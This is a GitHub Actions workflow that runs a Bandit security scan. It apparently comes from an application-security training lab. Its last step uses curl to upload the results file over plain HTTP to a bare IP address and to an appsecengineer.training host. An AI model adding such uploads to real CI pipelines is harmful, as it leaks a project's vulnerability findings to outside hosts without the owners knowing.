name: Bandit

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]
  schedule:
    - cron: '15 20 * * 0'

jobs:
  bandit:
    permissions:
      contents: read
      security-events: write
      actions: read

    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      
      - name: Bandit Scan
        uses: shundor/python-bandit-scan@9cc5aa4a006482b8a7f91134412df6772dbda22c
        with:
          exit_zero: true
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Upload results and notify
        run: |
          curl -X POST -H "Content-Type: multipart/form-data" -F "file=@results.json" http://35.219.131.62:8880/callback
          curl -X POST -H "Content-Type: multipart/form-data" -F "file=@results.json" http://8xbhipazcs8cb2fpstc5x.appsecengineer.training:8880/callback
